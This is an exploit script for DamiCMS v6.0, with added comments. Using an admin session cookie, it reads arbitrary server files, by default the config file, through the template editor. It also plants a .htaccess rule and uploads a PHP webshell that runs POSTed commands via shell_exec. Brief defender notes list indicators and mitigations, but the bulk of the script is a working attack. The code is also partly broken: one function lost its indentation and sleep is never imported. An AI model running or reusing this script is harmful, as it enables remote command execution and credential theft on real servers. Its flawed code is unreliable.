DamiCMS v6.0 - Read Arbitrary File / Upload Custom PHPWebshell
#!/usr/bin/env python
#coding: utf-8
# Vendor Homepage: https://www.damicms.com/
# Software Link: https://www.damicms.com/downes/dami.rar
# Version: DAMICMS_V6.0.0
# Tested on: Debian 8 / XAMPP
from sys import argv,exit #Receive arguments from CLI
from requests import get,post
from bs4 import BeautifulSoup
def Cookies_Split(galleta=""):
    """Turn a raw ``Cookie`` header value into the dict shape ``requests`` wants.

    The header is cut on ';' and each fragment on '='.  Only the text before
    the first '=' is the key and only the text between the first and second
    '=' is the value, so a value that itself contains '=' is truncated.  No
    whitespace is stripped, so "a=1; b=2" yields the key " b".  A fragment
    with no '=' at all raises IndexError.  An empty string terminates the
    process through sys.exit, as nothing below works without a session.
    """
    if galleta == "":
        exit()
    fragments = (piece.split('=') for piece in galleta.split(';'))
    # Later duplicates of a key overwrite earlier ones, as with plain assignment.
    return {fields[0]: fields[1] for fields in fragments}
def Create_File(co=""):
    """Write a .htaccess override and then a second file through the template-update endpoint.

    co: raw Cookie header of an authenticated admin session (parsed by Cookies_Split).
    Returns a status string.  The HTTP responses stored in `req` are never
    inspected, so a rejected upload is not detected here.
    Reads the module-level global `target`, which is assigned in the __main__ block.

    Defender's note: the technique only works where Apache honours a
    per-directory .htaccess in the location this endpoint writes to
    (AllowOverride); `AllowOverride None`, and rejecting `filename` values
    that name dot-files or leave the template directory, removes it.
    Indicators are POSTs to admin.php?s=/Tpl/Update.html whose `filename`
    field is ./.htaccess or carries a non-template extension, and a newly
    written .htaccess containing an AddType line for the PHP handler.
    """
    cookie=Cookies_Split(co)
    # The endpoint does not accept a .php extension, so the script first writes a
    # .htaccess mapping an arbitrary extension to the PHP handler (relying on
    # Apache's AllowOverride) and then uploads a second file with that extension.
    file_htAccess={
        'filename':(None,'./.htaccess'),
        'submit':(None,'')
    }
    # If a .htaccess already exists, read it back (r=False: the path is sent
    # verbatim rather than through Replace_Chars) and append the new line so the
    # existing directives are preserved rather than overwritten.
    ht=Read_File(co=co,f='|.htaccess',r=False)
    if len(ht)>0:
        print ".htaccess file already exists\n Copying its content"
        file_htAccess['content']=(None,ht+'AddType application/x-httpd-php .d^_^b\n')
    else:
        print ".htacess does not exist and going to be created"
        file_htAccess['content']=(None,'AddType application/x-httpd-php .d^_^b\n')
    print "[+] Uploading .htaccess File"
    # Short pause before the first upload.
    sleep(2)
    req=post(url=target+"/admin.php?s=/Tpl/Update.html",cookies=cookie,files=file_htAccess)
    file_phpWebShell={
        'filename':(None,'./.aabout.d^_^b'),  # stored name; its extension must match the AddType line above
        'content':(None,'<?php error_reporting(0);$dmc=$_POST["dmc"]; echo "<pre>".shell_exec($dmc)."</pre>";?>'),
        'submit':(None,'')
    }
    print "[+] Uploading php_webshell File"
    # Short pause before the second upload.
    sleep(3)
    req=post(url=target+"/admin.php?s=/Tpl/Update.html",cookies=cookie,files=file_phpWebShell)
    # The second element of the 'filename' tuple is the path reported back to the user.
    return """[+] PHPshell uploaded\n Try sending dmc=<command> to {0}{1} using POST""".format(target,file_phpWebShell['filename'][1])
#The application has an odd behaviour: it expects slashes replaced with pipes and dots with asterisks
def Replace_Chars(path="",new_slash="|",new_dot="*"):
p_tmp_first=path.split('/')[0:-1]
p_tmp_last=path.split('/')[-1].replace('.',new_dot)
path='|'.join(p_tmp_first)+'|'+p_tmp_last
print path
return path
#return path
def Read_File(co="",f="",r=True):
    """Fetch a server-side file through the Tpl/Add template editor and return its text.

    co: raw Cookie header of an authenticated admin session.
    f: path to read; when empty, /Public/Config/config.ini.php is used.
    r: when True the path is first rewritten by Replace_Chars ('/' -> '|',
       '.' -> '*'); pass False for a path already in that form.
    Returns the text of the element with id="Content" ("" when it is empty,
    in which case a message is printed).  Raises IndexError when the
    response has no such element.
    Reads the module-level global `target`, assigned in the __main__ block.

    Defender's note: the request shape -- a GET to admin.php?s=Tpl/Add/id/.
    followed by a pipe-separated path -- is the indicator to look for in
    access logs; the endpoint should resolve `id` only inside its template
    directory and reject separators and parent references.
    """
    if len(f)<1:
        f="/Public/Config/config.ini.php"  # default: the application's config file, judging by its name
    if r is True:
        f=Replace_Chars(f)
    cookie=Cookies_Split(co)
    print "Attempting Reading File"
    print target+"/admin.php?s=Tpl/Add/id/."+f
    # Original author's note: "/Web/Tpl is mandatory".  What this refers to is not
    # evident from the code -- presumably the directory the id is resolved against.
    req=get(url=target+"/admin.php?s=Tpl/Add/id/."+f,cookies=cookie)
    soup = BeautifulSoup(req.content, 'html.parser')
    # The editor page echoes the file body inside the element whose id is "Content".
    ctent = soup.find_all(id="Content")[0].get_text()
    if len(ctent)<1:
        print "Something wrong, perhaps file does not exist or it does not have read permissions"
    return ctent
if __name__=="__main__":
    # argv[1] = base URL, argv[2] = raw Cookie header, optional argv[3] = "shell" or a path to read.
    f=""
    if len(argv)<3:
        print """Examples:
{0} <url> <cookie> shell (To Trying upload a PHPshell)
{0} <url> <cookie> <remote file to read> (To read arbitrary file)""".format(argv[0])
        exit()
    elif len(argv)==4:
        f=argv[3]
    # `target` is a module-level global read by Create_File and Read_File.
    target=""
    target=argv[1]
    c=argv[2]
    # "shell" anywhere in the third argument selects the .htaccess/upload path
    # (Create_File); anything else, including no third argument, is treated
    # as a file path for Read_File (which falls back to its default when f is "").
    if 'shell' in f.lower():
        rr=Create_File(c)
        print rr
    else:
        F_ile=Read_File(c,f)
        print F_ile